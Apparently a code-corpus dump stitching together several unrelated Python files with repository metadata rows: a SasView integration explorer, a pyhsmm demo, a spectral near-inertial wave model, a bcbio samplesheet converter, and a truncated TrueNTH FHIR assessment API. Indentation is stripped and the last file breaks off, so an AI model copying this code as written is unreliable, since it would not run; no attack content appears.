pylab.ylabel("phi (degrees)")
cbar = pylab.colorbar()
cbar.set_label('log10 S(q)')
pylab.show()
def main():
import argparse
parser = argparse.ArgumentParser(
description="asymmetric integration explorer",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument('-s', '--shape', choices=SHAPES,
default='parallelepiped',
help='oriented shape')
parser.add_argument('-q', '--q_value', type=str, default='0.005',
help='Q value to evaluate')
parser.add_argument('pars', type=str, nargs='*', default=[],
help='p=val for p in shape parameters')
opts = parser.parse_args()
pars = {k: v for par in opts.pars for k, v in [par.split('=')]}
build_shape(opts.shape, **pars)
Q = float(opts.q_value)
if opts.shape == 'sphere':
print("exact", NORM*sp.sas_3j1x_x(Q*RADIUS)**2)
# Methods from quadpy, if quadpy is available
# AlbrechtCollatz: [1-5]
# BazantOh: 9, 11, 13
# HeoXu: 13, 15, 17, 19-[1-2], 21-[1-6], 23-[1-3], 25-[1-2], 27-[1-3],
# 29, 31, 33, 35, 37, 39-[1-2]
# FliegeMaier: 4, 9, 16, 25
# Lebedev: 3[a-c], 5, 7, 9, 11, 13, 15, 17, 19, 21, 23, 25, 27, 29, 31, 35,
# 41, 47, 53, 59, 65, 71, 77 83, 89, 95, 101, 107, 113, 119, 125, 131
# McLaren: [1-10]
# Stroud: U3 3-1, U3 5-[1-5], U3 7-[1-2], U3 8-1, U3 9-[1-3],
# U3 11-[1-3], U3 14-1
quadpy_method(Q, "AlbrechtCollatz:5")
quadpy_method(Q, "HeoXu:39-2")
quadpy_method(Q, "FliegeMaier:25")
quadpy_method(Q, "Lebedev:19")
quadpy_method(Q, "Lebedev:131")
quadpy_method(Q, "McLaren:10")
quadpy_method(Q, "Stroud:U3 14-1")
print("gauss-20 points=%d => %.15g" % gauss_quad_2d(Q, n=20))
print("gauss-76 points=%d => %.15g" % gauss_quad_2d(Q, n=76))
print("gauss-150 points=%d => %.15g" % gauss_quad_2d(Q, n=150))
print("gauss-500 points=%d => %.15g" % gauss_quad_2d(Q, n=500))
print("gauss-1025 points=%d => %.15g" % gauss_quad_2d(Q, n=1025))
print("gauss-2049 points=%d => %.15g" % gauss_quad_2d(Q, n=2049))
print("gauss-20 usub points=%d => %.15g" % gauss_quad_usub(Q, n=20))
print("gauss-76 usub points=%d => %.15g" % gauss_quad_usub(Q, n=76))
print("gauss-150 usub points=%d => %.15g" % gauss_quad_usub(Q, n=150))
#gridded_2d(Q, n=2**8+1)
gridded_2d(Q, n=2**10+1)
#gridded_2d(Q, n=2**12+1)
#gridded_2d(Q, n=2**15+1)
# adaptive forms on models for which the calculations are fast enough
SLOW_SHAPES = {
'fcc_paracrystal', 'bcc_paracrystal', 'sc_paracrystal',
'core_shell_parallelepiped',
}
if opts.shape not in SLOW_SHAPES:
print("dblquad", *scipy_dblquad_2d(Q))
print("semi-romberg-100", *semi_romberg_2d(Q, n=100))
print("romberg", *scipy_romberg_2d(Q))
with mp.workprec(100):
print("mpmath", *mp_quad_2d(mp.mpf(opts.q_value)))
plot_2d(Q, n=200)
if __name__ == "__main__":
main()
|
SasView/sasmodels
|
explore/asymint.py
|
Python
|
bsd-3-clause
| 20,630
|
[
"Gaussian"
] |
1f47a4551fb720f8dd1022c62aad8879cca70c5c5f24fe2b579746c58612bb6c
|
from __future__ import division
import numpy as np
np.seterr(divide='ignore') # these warnings are usually harmless for this code
from matplotlib import pyplot as plt
import copy, os
import pyhsmm
from pyhsmm.util.text import progprint_xrange
SAVE_FIGURES = False
print \
'''
This demo shows the HDP-HSMM in action. Its iterations are slower than those for
the (Sticky-)HDP-HMM, but explicit duration modeling can be a big advantage for
conditioning the prior or for discovering structure in data.
'''
###############
# load data #
###############
T = 1000
data = np.loadtxt(os.path.join(os.path.dirname(__file__),'example-data.txt'))[:T]
#########################
# posterior inference #
#########################
# Set the weak limit truncation level
Nmax = 25
# and some hyperparameters
obs_dim = data.shape[1]
obs_hypparams = {'mu_0':np.zeros(obs_dim),
'sigma_0':np.eye(obs_dim),
'kappa_0':0.25,
'nu_0':obs_dim+2}
dur_hypparams = {'alpha_0':2*30,
'beta_0':2}
obs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams) for state in range(Nmax)]
dur_distns = [pyhsmm.distributions.PoissonDuration(**dur_hypparams) for state in range(Nmax)]
posteriormodel = pyhsmm.models.WeakLimitHDPHSMM(
alpha=6.,gamma=6., # these can matter; see concentration-resampling.py
init_state_concentration=6., # pretty inconsequential
obs_distns=obs_distns,
dur_distns=dur_distns)
posteriormodel.add_data(data,trunc=60) # duration truncation speeds things up when it's possible
models = []
for idx in progprint_xrange(150):
posteriormodel.resample_model()
if (idx+1) % 10 == 0:
models.append(copy.deepcopy(posteriormodel))
fig = plt.figure()
for idx, model in enumerate(models):
plt.clf()
model.plot()
plt.gcf().suptitle('HDP-HSMM sampled after %d iterations' % (10*(idx+1)))
if SAVE_FIGURES:
plt.savefig('iter_%.3d.png' % (10*(idx+1)))
plt.show()
|
bikash/pyhsmm
|
examples/hsmm.py
|
Python
|
mit
| 1,985
|
[
"Gaussian"
] |
47fbfe1d6ae3178877d2b92b1769e5856d49b16c3417061621f27a78d3a41095
|
import numpy as np
import time
from ..doublyPeriodic import doublyPeriodicModel
from numpy import pi
class model(doublyPeriodicModel):
def __init__(self, name = None,
# Grid parameters
nx = 256, ny = None, Lx = 1e6, Ly = None,
# Solver parameters
t = 0.0,
dt = 1.0, # Numerical timestep
step = 0,
timeStepper = "RK4", # Time-stepping method
nThreads = 1, # Number of threads for FFTW
useFilter = False,
#
# Near-inertial equation params: rotating and gravitating Earth
f0 = 1.0,
kappa = 64.0,
# Friction: 4th order hyperviscosity
waveVisc = 1.0e-4,
waveViscOrder = 2.0,
meanVisc = 1.0e-4,
meanViscOrder = 2.0,
):
# Physical parameters specific to the Physical Problem
self.f0 = f0
self.kappa = kappa
self.meanVisc = meanVisc
self.meanViscOrder = meanViscOrder
self.waveVisc = waveVisc
self.waveViscOrder = waveViscOrder
# Initialize super-class.
doublyPeriodicModel.__init__(self, name = name,
physics = "two-dimensional turbulence and the" + \
" near-inertial wave equation",
nVars = 2,
realVars = False,
# Persistent doublyPeriodic initialization arguments
nx = nx, ny = ny, Lx = Lx, Ly = Ly, t = t, dt = dt, step = step,
timeStepper = timeStepper, nThreads = nThreads, useFilter = useFilter,
)
## Default vorticity initial condition: Gaussian vortex
rVortex = self.Lx/20
q0 = 0.1*self.f0 * np.exp( \
- ( (self.XX-self.Lx/2.0)**2.0 + (self.YY-self.Ly/2.0)**2.0 ) \
/ (2*rVortex**2.0) \
)
self.set_q(q0)
# Default wave initial condition: uniform velocity.
A0 = np.ones(self.physVarShape)
self.set_A(A0)
# Methods - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def describe_physics(self):
print("""
This model solves the linearized near-inertial wave equation, also \n
known as the YBJ equation, and the \n
two-dimensional vorticity equation simulataneously. \n
Arbitrary-order hyperdissipation can be specified for both. \n
There are two prognostic variables: wave amplitude, and mean vorticity.
""")
def _set_linear_coeff(self):
""" Calculate the coefficient that multiplies the linear left hand
side of the equation """
# Two-dimensional turbulent part.
self.linearCoeff[:, :, 0] = -self.meanVisc \
* (self.KK**2.0 + self.LL**2.0)**(self.meanViscOrder/2.0)
waveDissipation = -self.waveVisc \
* (self.KK**2.0 + self.LL**2.0)**(self.waveViscOrder/2.0)
waveDispersion = -1j*self.f0/(2.0*self.kappa**2.0) \
* ( self.KK**2.0 + self.LL**2.0)
self.linearCoeff[:, :, 1] = waveDissipation + waveDispersion
def _calc_right_hand_side(self, soln, t):
""" Calculate the nonlinear right hand side of PDE """
# Views for clarity:
qh = soln[:, :, 0]
Ah = soln[:, :, 1]
# Physical-space things
self.q = np.real(self.ifft2(qh))
self.A = self.ifft2(Ah)
# Calculate streamfunction
self.psih = -qh / self.divideSafeKay2
# Mean velocities
self.U = -np.real(self.ifft2(self.jLL*self.psih))
self.V = np.real(self.ifft2(self.jKK*self.psih))
# Views to clarify calculation of A's RHS
U = self.U
V = self.V
q = self.q
A = self.A
# Right hand side for q
self.RHS[:, :, 0] = -self.jKK*self.fft2(U*q) - self.jLL*self.fft2(V*q)
# Right hand side for A, in steps:
## 1. Advection term,
self.RHS[:, :, 1] = -self.jKK*self.fft2(U*A) - self.jLL*self.fft2(V*A) \
-1j/2.0*self.fft2(q*A)
self._dealias_RHS()
def _init_problem_parameters(self):
""" Pre-allocate parameters in memory in addition to the solution """
# Divide-safe square wavenumber
self.divideSafeKay2 = self.KK**2.0 + self.LL**2.0
self.divideSafeKay2[0, 0] = float('Inf')
# Vorticity and wave-field amplitude
self.q = np.zeros(self.physVarShape, np.dtype('float64'))
self.A = np.zeros(self.physVarShape, np.dtype('complex128'))
# Streamfunction transform
self.psih = np.zeros(self.specVarShape, np.dtype('complex128'))
# Mean and wave velocity components
self.U = np.zeros(self.physVarShape, np.dtype('float64'))
self.V = np.zeros(self.physVarShape, np.dtype('float64'))
def update_state_variables(self):
""" Update diagnostic variables to current model state """
# Views for clarity:
qh = self.soln[:, :, 0]
Ah = self.soln[:, :, 1]
# Streamfunction
self.psih = - qh / self.divideSafeKay2
# Physical-space PV and velocity components
self.q = np.real(self.ifft2(qh))
self.A = self.ifft2(Ah)
self.U = -np.real(self.ifft2(self.jLL*self.psih))
self.V = np.real(self.ifft2(self.jKK*self.psih))
def set_q(self, q):
""" Set model vorticity """
self.soln[:, :, 0] = self.fft2(q)
self.soln = self._dealias_array(self.soln)
self.update_state_variables()
def set_A(self, A):
""" Set model wave field amplitude"""
self.soln[:, :, 1] = self.fft2(A)
self.soln = self._dealias_array(self.soln)
self.update_state_variables()
def plot_current_state(self):
""" Create a simple plot that shows the state of the model."""
# Figure out how to do this efficiently.
import matplotlib.pyplot as plt
self.update_state_variables()
# Initialize colorbar dictionary
colorbarProperties = {
'orientation' : 'vertical',
'shrink' : 0.8,
'extend' : 'neither',
}
self.fig = plt.figure('Hydrostatic wave equation',
figsize=(8, 4))
ax1 = plt.subplot(121)
plt.pcolormesh(self.xx, self.yy, self.q, cmap='RdBu_r')
plt.axis('square')
ax2 = plt.subplot(122)
plt.pcolormesh(self.xx, self.yy, np.sqrt(self.uu**2.0+self.vv**2.0))
plt.axis('square')
def describe_model(self):
""" Describe the current model state """
print("\nThis is a doubly-periodic spectral model for \n" + \
"{:s} \n".format(self.physics) + \
"with the following attributes:\n\n" + \
" Domain : {:.2e} X {:.2e} m\n".format(self.Lx, self.Ly) + \
" Resolution : {:d} X {:d}\n".format(self.nx, self.ny) + \
" Timestep : {:.2e} s\n".format(self.dt) + \
" Current time : {:.2e} s\n\n".format(self.t) + \
"The FFT scheme uses {:d} thread(s).\n".format(self.nThreads))
|
glwagner/py2Periodic
|
py2Periodic/physics/nearInertialWaves_xy.py
|
Python
|
mit
| 7,349
|
[
"Gaussian"
] |
4543f52e3e7bf17ab4f2c6d06c215beedd23350a2fd21b10c3e9e795ff556183
|
"""Converts Illumina SampleSheet CSV files to the run_info.yaml input file.
This allows running the analysis pipeline without Galaxy, using CSV input
files from Illumina SampleSheet or Genesifter.
"""
import os
import csv
import itertools
import difflib
import glob
import yaml
from bcbio.illumina import flowcell
from bcbio import utils
# ## Create samplesheets
def from_flowcell(run_folder, lane_details, out_dir=None):
"""Convert a flowcell into a samplesheet for demultiplexing.
"""
fcid = os.path.basename(run_folder)
if out_dir is None:
out_dir = run_folder
out_file = os.path.join(out_dir, "%s.csv" % fcid)
with open(out_file, "w") as out_handle:
writer = csv.writer(out_handle)
writer.writerow(["FCID", "Lane", "Sample_ID", "SampleRef", "Index",
"Description", "Control", "Recipe", "Operator", "SampleProject"])
for ldetail in lane_details:
writer.writerow(_lane_detail_to_ss(fcid, ldetail))
return out_file
def _lane_detail_to_ss(fcid, ldetail):
"""Convert information about a lane into Illumina samplesheet output.
"""
return [fcid, ldetail["lane"], ldetail["name"], ldetail["genome_build"],
ldetail["bc_index"], ldetail["description"], "N", "", "",
ldetail["project_name"]]
# ## Use samplesheets to create YAML files
def _organize_lanes(info_iter, barcode_ids):
"""Organize flat lane information into nested YAML structure.
"""
all_lanes = []
for (fcid, lane, sampleref), info in itertools.groupby(info_iter, lambda x: (x[0], x[1], x[1])):
info = list(info)
cur_lane = dict(flowcell_id=fcid, lane=lane, genome_build=info[0][3], analysis="Standard")
if not _has_barcode(info):
cur_lane["description"] = info[0][1]
else: # barcoded sample
cur_lane["description"] = "Barcoded lane %s" % lane
multiplex = []
for (_, _, sample_id, _, bc_seq) in info:
bc_type, bc_id = barcode_ids[bc_seq]
multiplex.append(dict(barcode_type=bc_type,
barcode_id=bc_id,
sequence=bc_seq,
name=sample_id))
cur_lane["multiplex"] = multiplex
all_lanes.append(cur_lane)
return all_lanes
def _has_barcode(sample):
if sample[0][4]:
return True
def _generate_barcode_ids(info_iter):
"""Create unique barcode IDs assigned to sequences
"""
bc_type = "SampleSheet"
barcodes = list(set([x[-1] for x in info_iter]))
barcodes.sort()
barcode_ids = {}
for i, bc in enumerate(barcodes):
barcode_ids[bc] = (bc_type, i+1)
return barcode_ids
def _read_input_csv(in_file):
"""Parse useful details from SampleSheet CSV file.
"""
with open(in_file, "rU") as in_handle:
reader = csv.reader(in_handle)
reader.next() # header
for line in reader:
if line: # empty lines
(fc_id, lane, sample_id, genome, barcode) = line[:5]
yield fc_id, lane, sample_id, genome, barcode
def _get_flowcell_id(in_file, require_single=True):
"""Retrieve the unique flowcell id represented in the SampleSheet.
"""
fc_ids = set([x[0] for x in _read_input_csv(in_file)])
if require_single and len(fc_ids) > 1:
raise ValueError("There are several FCIDs in the same samplesheet file: %s" % in_file)
else:
return fc_ids
def csv2yaml(in_file, out_file=None):
"""Convert a CSV SampleSheet to YAML run_info format.
"""
if out_file is None:
out_file = "%s.yaml" % os.path.splitext(in_file)[0]
barcode_ids = _generate_barcode_ids(_read_input_csv(in_file))
lanes = _organize_lanes(_read_input_csv(in_file), barcode_ids)
with open(out_file, "w") as out_handle:
out_handle.write(yaml.safe_dump(lanes, default_flow_style=False))
return out_file
def run_has_samplesheet(fc_dir, config, require_single=True):
"""Checks if there's a suitable SampleSheet.csv present for the run
"""
fc_name, _ = flowcell.parse_dirname(fc_dir)
sheet_dirs = config.get("samplesheet_directories", [])
fcid_sheet = {}
for ss_dir in (s for s in sheet_dirs if os.path.exists(s)):
with utils.chdir(ss_dir):
for ss in glob.glob("*.csv"):
fc_ids = _get_flowcell_id(ss, require_single)
for fcid in fc_ids:
if fcid:
fcid_sheet[fcid] = os.path.join(ss_dir, ss)
# difflib handles human errors while entering data on the SampleSheet.
# Only one best candidate is returned (if any). 0.85 cutoff allows for
# maximum of 2 mismatches in fcid
potential_fcids = difflib.get_close_matches(fc_name, fcid_sheet.keys(), 1, 0.85)
if len(potential_fcids) > 0 and fcid_sheet.has_key(potential_fcids[0]):
return fcid_sheet[potential_fcids[0]]
else:
return None
|
Cyberbio-Lab/bcbio-nextgen
|
bcbio/illumina/samplesheet.py
|
Python
|
mit
| 5,032
|
[
"Galaxy"
] |
b632e6f3ed87c30c3fbc1d0875955e5983978b673a38a984d4e54667eb06d52b
|
"""Assessment Engine API view functions"""
from datetime import datetime
from flask import (
Blueprint,
abort,
current_app,
flash,
jsonify,
make_response,
redirect,
request,
session,
url_for,
)
from flask_babel import gettext as _
from flask_user import roles_required
from urllib.parse import quote
import jsonschema
import requests
from ..audit import auditable_event
from ..database import db
from ..date_tools import FHIR_datetime
from ..extensions import oauth
from ..models.client import validate_origin
from ..models.encounter import EC
from ..models.fhir import bundle_results
from ..models.identifier import Identifier
from ..models.intervention import INTERVENTION
from ..models.qb_timeline import invalidate_users_QBT
from ..models.questionnaire import Questionnaire
from ..models.questionnaire_response import (
NoFutureDates,
QuestionnaireResponse,
)
from ..models.research_study import (
ResearchStudy,
research_study_id_from_questionnaire,
)
from ..models.role import ROLE
from ..models.user import current_user, get_user
from ..timeout_lock import LockTimeout, guarded_task_launch
from .crossdomain import crossdomain
assessment_engine_api = Blueprint('assessment_engine_api', __name__)
@assessment_engine_api.route(
'/api/patient/<int:patient_id>/assessment',
defaults={'instrument_id': None},
)
@assessment_engine_api.route(
'/api/patient/<int:patient_id>/assessment/<string:instrument_id>'
)
@crossdomain()
@oauth.require_oauth()
def assessment(patient_id, instrument_id):
"""Return a patient's responses to questionnaire(s)
Retrieve a minimal FHIR doc in JSON format including the
'QuestionnaireResponse' resource type. If 'instrument_id'
is excluded, the patient's QuestionnaireResponses for all
instruments are returned.
---
operationId: getQuestionnaireResponse
tags:
- Assessment Engine
produces:
- application/json
parameters:
- name: patient_id
in: path
description: TrueNTH patient ID
required: true
type: integer
format: int64
- name: instrument_id
in: path
description:
ID of the instrument, eg "epic26", "eq5d"
required: true
type: string
enum:
- epic26
- eq5d
- name: patch_dstu2
in: query
description: whether or not to make bundles DTSU2 compliant
required: false
type: boolean
default: false
responses:
200:
description: successful operation
schema:
id: assessment_bundle
required:
- type
properties:
type:
description:
Indicates the purpose of this bundle- how it was
intended to be used.
type: string
enum:
- document
- message
- transaction
- transaction-response
- batch
- batch-response
- history
- searchset
- collection
link:
description:
A series of links that provide context to this bundle.
items:
properties:
relation:
description:
A name which details the functional use for
this link - see [[http://www.iana.org/assignments/link-relations/link-relations.xhtml]].
url:
description: The reference details for the link.
total:
description:
If a set of search matches, this is the total number of
matches for the search (as opposed to the number of
results in this bundle).
type: integer
entry:
type: array
items:
$ref: "#/definitions/QuestionnaireResponse"
example:
entry:
- resourceType: QuestionnaireResponse
authored: '2016-01-22T20:32:17Z'
status: completed
identifier:
value: '101.0'
use: official
label: cPRO survey session ID
subject:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
author:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
source:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
group:
question:
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.1.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 5
linkId: epic26.1
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.2.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.2
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.3.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.3
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.4.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.4
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.5.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 0
linkId: epic26.5
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.6.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.6
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.7.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.7
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.8.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.8
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.9.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.9
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.10.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 0
linkId: epic26.10
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.11.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.11
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.12.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.12
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.13.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.13
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.14.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.14
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.15.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.15
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.16.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.16
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.17.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.17
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.18.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.18
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.19.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.19
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.20.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.20
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.21.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.21
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.22.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 0
linkId: epic26.22
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.23.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.23
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.24.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.24
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.25.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.25
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.26.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.26
questionnaire:
display: EPIC 26 Short Form
reference: https://stg.us.truenth.org/api/questionnaires/epic26
- resourceType: QuestionnaireResponse
authored: '2016-03-11T23:47:28Z'
status: completed
identifier:
value: '119.0'
use: official
label: cPRO survey session ID
subject:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
author:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
source:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
group:
question:
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.1.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.1
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.2.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.2
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.3.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.3
- answer: []
linkId: epic26.4
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.5.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.5
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.6.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.6
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.7.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.7
- answer: []
linkId: epic26.8
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.9.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.9
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.10.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.10
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.11.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.11
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.12.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.12
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.13.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.13
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.14.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 0
linkId: epic26.14
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.15.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 5
linkId: epic26.15
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.16.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.16
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.17.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.17
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.18.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.18
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.19.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.19
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.20.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.20
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.21.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 5
linkId: epic26.21
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.22.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 0
linkId: epic26.22
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.23.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.23
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.24.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.24
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.25.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.25
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.26.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.26
questionnaire:
display: EPIC 26 Short Form
reference: https://stg.us.truenth.org/api/questionnaires/epic26
link:
href: https://stg.us.truenth.org/api/patient/10015/assessment/epic26
rel: self
resourceType: Bundle
total: 2
type: searchset
updated: '2016-03-14T20:47:26.282263Z'
401:
description:
if missing valid OAuth token or logged-in user lacks permission
to view requested patient
security:
- ServiceToken: []
"""
patient = get_user(
patient_id, 'view', allow_on_url_authenticated_encounters=True)
questionnaire_responses = QuestionnaireResponse.query.filter_by(
subject_id=patient.id).order_by(
QuestionnaireResponse.document['authored'].desc())
instrument_id = request.args.get('instrument_id', instrument_id)
if instrument_id is not None:
questionnaire_responses = questionnaire_responses.filter(
QuestionnaireResponse.document[
("questionnaire", "reference")
].astext.endswith(instrument_id)
)
documents = []
for qnr in questionnaire_responses:
# NB, document_answered returns a (potentially) modified *copy* of
# the document, so changes aren't persisted or found in db session
# cached objects. see TN-2417 for example side-effects
document = qnr.document_answered
for question in document['group']['question']:
for answer in question['answer']:
# Hack: Extensions should be a list, correct in-place if need be
# todo: migrate towards FHIR spec in persisted data
if (
'extension' in answer.get('valueCoding', {}) and
